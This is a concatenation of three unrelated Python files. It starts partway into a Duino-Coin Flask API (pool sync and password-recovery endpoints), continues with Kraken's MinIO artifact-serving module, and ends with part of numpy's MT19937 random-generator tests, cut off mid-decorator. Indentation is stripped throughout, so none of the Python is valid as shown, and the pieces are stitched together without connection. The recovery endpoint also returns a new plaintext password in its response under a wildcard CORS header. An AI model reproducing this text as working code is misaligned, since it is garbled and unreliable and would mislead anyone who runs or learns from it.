syncData["cpu"] = str(request.args.get('cpu', None))
syncData["ram"] = str(request.args.get('ram', None))
syncData["connections"] = str(request.args.get('connections', None))
syncData["post"] = "False"
if request.method == 'POST':
syncData["post"] = "True"
except Exception as e:
return _error(f"Invalid data: {e}")
while True:
try:
port = choice([2810, 2809, 2808, 2807, 2806])
s.connect(("127.0.0.1", port))
recv_ver = s.recv(5).decode().rstrip("\n")
if not recv_ver:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
elif float(recv_ver) != 2.7:
dbg(f"Warning: {loginInfos['name']} server versions don't match: {2.7}, {recv_ver}")
return _error(f"Invalid ver: {recv_ver}")
s.sendall(f"PoolLogin,{json.dumps(loginInfos)}\n".encode("utf-8"))
login_state = s.recv(16).decode().rstrip("\n")
if not login_state:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
if login_state != "LoginOK":
dbg(f"Error: {loginInfos['name']} invalid login state: {login_state}")
return _error(login_state)
s.sendall(f"PoolSync,{json.dumps(syncData)}\n".encode("utf-8"))
sync_state = s.recv(16).decode().rstrip("\n")
if not sync_state:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
if sync_state != "SyncOK":
dbg(f"Error: {loginInfos['name']} invalid sync state: {sync_state}")
return _error(sync_state)
s.close()
# dbg(f"Success: {loginInfos['name']} synced")
return _success(sync_state)
except Exception as e:
if not "timed out" in str(e) and not "abort" in str(e):
dbg(f"Error: {loginInfos['name']} {e}")
return _error("Sync error: " + str(e))
@app.route("/recovering/<username>")
@limiter.limit("1 per 1 day")
def api_recovering(username: str):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
pwd_hash = request.args.get('hash', None)
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
try:
token_hash = jwt.decode(pwd_hash, app.config['SECRET_KEY'], algorithms=['HS256'])
except jwt.ExpiredSignatureError:
return _error('Signature expired. Please log in again.')
except jwt.InvalidTokenError:
return _error('Invalid token. Please log in again.')
if username is None or username == '':
return _error("Invalid username.")
if username != token_hash['username']:
return _error("Invalid username.")
if user_exists(username):
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT * FROM Users WHERE username = ?""",(username,))
data = datab.fetchone()
if data is None:
return _error("Invalid username.")
if token_hash['email'] != data[2]:
return _error("Invalid token.")
except Exception as e:
print(e)
return _error("Error connecting to DataBase")
alphabet = string.ascii_letters + string.digits
genPassword = ''.join(secrets.choice(alphabet) for i in range(20))
try:
tmpPass = hashpw(genPassword.encode("utf-8"),
gensalt(rounds=BCRYPT_ROUNDS))
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""UPDATE Users
set password = ?
where username = ?""",
(tmpPass, username))
conn.commit()
response = jsonify(result="Your password has been changed, you can now login with your new password", password=genPassword, success=True)
response.headers.add('Access-Control-Allow-Origin', '*')
return response, 200
except Exception as e:
print(e)
return _error(f"Error fetching database")
else:
return _error("This username doesn't exist")
@app.route("/recovery/")
@limiter.limit("1 per 1 day")
def api_recovery():
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
username = request.args.get('username', None)
print(repr(username), "recv")
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
if username:
if user_exists(username):
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT * FROM Users WHERE username = ?""", (username,))
email = str(datab.fetchone()[2])
try:
message = MIMEMultipart("alternative")
message["Subject"] = "🔗 Your Duino-Coin passphrase reset link"
message["From"] = DUCO_EMAIL
message["To"] = email
time = datetime.datetime.utcnow() + datetime.timedelta(minutes=30)
hash = jwt.encode({'username': username, 'email': email, 'exp' : time}, app.config['SECRET_KEY'], algorithm='HS256')
recoveryUrl = "https://wallet.duinocoin.com/recovery.html?username=" + \
username + "&hash=" + \
str(hash).strip("b").strip("'").strip("'")
email_body = html_recovery_template.replace(
"{username}", str(username)).replace(
"{link}", str(recoveryUrl))
part = MIMEText(email_body, "html")
message.attach(part)
with smtplib.SMTP_SSL("smtp.gmail.com", 465) as smtpserver:
smtpserver.login(DUCO_EMAIL, DUCO_PASS)
smtpserver.sendmail(
DUCO_EMAIL, email, message.as_string())
response = jsonify(result="An e-mail has been sent to you with the reset link - please check your mailbox", success=True)
response.headers.add('Access-Control-Allow-Origin', '*')
return response, 200
except Exception as e:
return _error("Error sending e-mail, please try again later")
except Exception as e:
return _error("Error fetching database, please try again later")
else:
return _error("This username isn't registered, make sure you're entering the correct name")
else:
return _error("Username not provided")
|
storage.py
|
#!/usr/bin/env python3
# Copyright 2020 The Kraken Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import mimetypes
from queue import Queue, Empty
from threading import Thread, Event
from flask import abort, Response
import minio
from .models import Run, Flow
from . import consts
log = logging.getLogger('storage')
class MinioDownloader:
def __init__(self, bucket_name, timeout=0.01):
minio_addr = os.environ.get('KRAKEN_MINIO_ADDR', consts.DEFAULT_MINIO_ADDR)
access_key = os.environ['MINIO_ACCESS_KEY']
secret_key = os.environ['MINIO_SECRET_KEY']
self.mc = minio.Minio(minio_addr, access_key=access_key, secret_key=secret_key, secure=False)
found = self.mc.bucket_exists(bucket_name)
if not found:
raise Exception('missing %s minio bucket' % bucket_name)
self.bucket_name = bucket_name
self.timeout = timeout
self.bytes = Queue()
self.finished = Event()
self.worker = None
def get_bytes(self, filename):
resp = self.mc.get_object(self.bucket_name, filename)
for chunk in resp.stream():
self.bytes.put(chunk)
resp.release_conn()
self.bytes.join() # wait for all blocks in the queue to be marked as processed
self.finished.set() # mark streaming as finished
def send_bytes(self):
while not self.finished.is_set():
try:
yield self.bytes.get(timeout=self.timeout)
self.bytes.task_done()
except Empty:
self.finished.wait(self.timeout)
self.worker.join()
def download(self, filename):
self.worker = Thread(target=self.get_bytes, args=(filename,))
self.worker.start()
return self.send_bytes()
def serve_artifact(store_type, flow_id, run_id, path):
log.info('path %s, %s, %s, %s', store_type, flow_id, run_id, path)
if store_type not in ['public', 'report']:
abort(400, "Not supported store type: %s" % store_type)
if flow_id:
flow = Flow.query.filter_by(id=int(flow_id)).one_or_none()
if flow is None:
abort(404, "Flow not found")
runs = []
for r in flow.runs:
runs.append(r.id)
runs.sort()
run_id = runs[-1]
else:
run = Run.query.filter_by(id=int(run_id)).one_or_none()
if run is None:
abort(404, "Run not found")
flow = run.flow
mt, _ = mimetypes.guess_type(path)
if mt is None:
mt = 'application/octet-stream'
bucket_name = '%08d' % flow.branch_id
mc_dl = MinioDownloader(bucket_name)
path = os.path.join(str(flow.id), str(run_id), path)
resp = Response(mc_dl.download(path), mimetype=mt)
return resp
def serve_flow_artifact(store_type, flow_id, path):
return serve_artifact(store_type, flow_id, None, path)
def serve_run_artifact(store_type, run_id, path):
return serve_artifact(store_type, None, run_id, path)
|
test_generator_mt19937.py
|
import sys
import hashlib
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
JUMP_TEST_DATA = [
{
"seed": 0,
"steps": 10,
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "8cb7b061136efceef5217a9ce2cc9a5a", "pos": 598},
},
{
"seed":384908324,
"steps":312,
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "2ecdbfc47a895b253e6e19ccb2e74b90", "pos": 276},
},
{
"seed": [839438204, 980239840, 859048019, 821],
"steps": 511,
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "433b85229f2ed853cde06cd872818305", "pos": 475},
},
]
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed:
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_multidimensional_pvals(self):
assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
def setup(self):
self.seed = 8675309
def test_argument_validation(self):
# Error cases...
# `colors` must be a 1-d sequence
assert_raises(ValueError, random.multivariate_hypergeometric,
10, 4)
# Negative nsample
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], -1)
# Negative color
assert_raises(ValueError, random.multivariate_hypergeometric,
[-1, 2, 3], 2)
# nsample exceeds sum(colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], 10)
# nsample exceeds sum(colors) (edge case of empty colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[], 1)
# Validation errors associated with very large values in colors.
assert_raises(ValueError, random.multivariate_hypergeometric,
[999999999, 101], 5, 1, 'marginals')
int64_info = np.iinfo(np.int64)
max_int64 = int64_info.max
max_int64_index = max_int64 // int64_info.dtype.itemsize
assert_raises(ValueError, random.multivariate_hypergeometric,
[max_int64_index - 100, 101], 5, 1, 'count')
@pytest.mark.parametrize('method', ['count', 'marginals'])
def test_edge_cases(self, method):
# Set the seed, but in fact, all the results in this test are
# deterministic, so we don't really need this.
random = Generator(MT19937(self.seed))
x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([], 0, method=method)
assert_array_equal(x, [])
x = random.multivariate_hypergeometric([], 0, size=1, method=method)
assert_array_equal(x, np.empty((1, 0), dtype=np.int64))
x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
assert_array_equal(x, [3, 0, 0])
colors = [1, 1, 0, 1, 1]
x = random.multivariate_hypergeometric(colors, sum(colors),
method=method)
assert_array_equal(x, colors)
x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
method=method)
assert_array_equal(x, [[3, 4, 5]]*3)
# Cases for nsample:
# nsample < 10
# 10 <= nsample < colors.sum()/2
# colors.sum()/2 < nsample < colors.sum() - 10
# colors.sum() - 10 < nsample < colors.sum()
@pytest.mark.parametrize('nsample', [8, 25, 45, 55])
@pytest.mark.parametrize('method', ['count', 'marginals'])
@pytest.mark.parametrize('size', [5, (2, 3), 150000])
def test_typical_cases(self, nsample, method, size):
random = Generator(MT19937(self.seed))
colors = np.array([10, 5, 20, 25])
sample = random.multivariate_hypergeometric(colors, nsample, size,
method=method)
if isinstance(size, int):
expected_shape = (size,) + colors.shape
else:
expected_shape = size + colors.shape
assert_equal(sample.shape, expected_shape)
assert_((sample >= 0).all())
assert_((sample <= colors).all())
assert_array_equal(sample.sum(axis=-1),
np.full(size, fill_value=nsample, dtype=int))
if isinstance(size, int) and size >= 100000:
# This sample is large enough to compare its mean to
# the expected values.
assert_allclose(sample.mean(axis=0),
nsample * colors / colors.sum(),
rtol=1e-3, atol=0.005)
def test_repeatability1(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
method='count')
expected = np.array([[2, 1, 2],
[2, 1, 2],
[1, 1, 3],
[2, 0, 3],
[2, 1, 2]])
assert_array_equal(sample, expected)
def test_repeatability2(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 50,
size=5,
method='marginals')
expected = np.array([[ 9, 17, 24],
[ 7, 13, 30],
[ 9, 15, 26],
[ 9, 17, 24],
[12, 14, 24]])
assert_array_equal(sample, expected)
def test_repeatability3(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 12,
size=5,
method='marginals')
expected = np.array([[2, 3, 7],
[5, 3, 4],
[2, 5, 5],
[5, 3, 4],
[1, 5, 6]])
assert_array_equal(sample, expected)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'ba71ccaffeeeb9eeb1860f8075020b9c',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'ba71ccaffeeeb9eeb1860f8075020b9c'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
@pytest.mark.parametrize(
'bound, expected',
[(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
3769704066, 1170797179, 4108474671])),
(2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
3769704067, 1170797180, 4108474672])),
(2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
1831631863, 1215661561, 3869512430]))]
)
def test_repeatability_32bit_boundary(self, bound, expected):
for size in [None, len(expected)]:
random = Generator(MT19937(1234))
x = random.integers(bound, size=size)
assert_equal(x, expected if size is not None else expected[0])
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[1622936284, 3620788691, 1659384060],
[1417365545, 760222891, 1909653332],
[3788118662, 660249498, 4092002593]],
[[3625610153, 2979601262, 3844162757],
[ 685800658, 120261497, 2694012896],
[1207779440, 1586594375, 3854335050]],
[[3004074748, 2310761796, 3012642217],
[2067714190, 2786677879, 1363865881],
[ 791663441, 1867303284, 2169727960]],
[[1939603804, 1250951100, 298950036],
[1040128489, 3791912209, 3317053765],
[3155528714, 61360675, 2305155588]],
[[ 817688762, 1335621943, 3288952434],
[1770890872, 1102951817, 1957607470],
[3099996017, 798043451, 48334215]]])
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345))
x = random.integers([[-1], [0], [1]],
[2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
# chi2max is the maximum acceptable chi-squared value.
@pytest.mark.slow
@pytest.mark.parametrize('sample_size,high,dtype,chi2max',
[(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25
(5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30
(10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
